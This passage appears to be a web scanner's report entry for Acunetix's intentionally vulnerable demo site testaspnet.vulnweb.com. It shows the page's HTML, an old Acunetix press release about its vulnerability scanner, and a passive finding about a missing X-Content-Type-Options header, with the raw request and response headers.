uZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 349 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 17979
Response Body - size: 17,979 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfK